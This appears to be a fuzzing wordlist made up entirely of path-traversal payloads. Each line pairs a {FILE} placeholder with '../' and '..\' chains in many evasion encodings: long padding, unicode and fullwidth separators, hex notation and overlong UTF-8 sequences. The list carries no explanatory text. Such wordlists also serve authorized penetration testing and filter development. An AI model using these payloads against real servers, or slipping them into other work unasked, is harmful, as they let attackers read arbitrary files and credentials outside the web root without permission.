AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
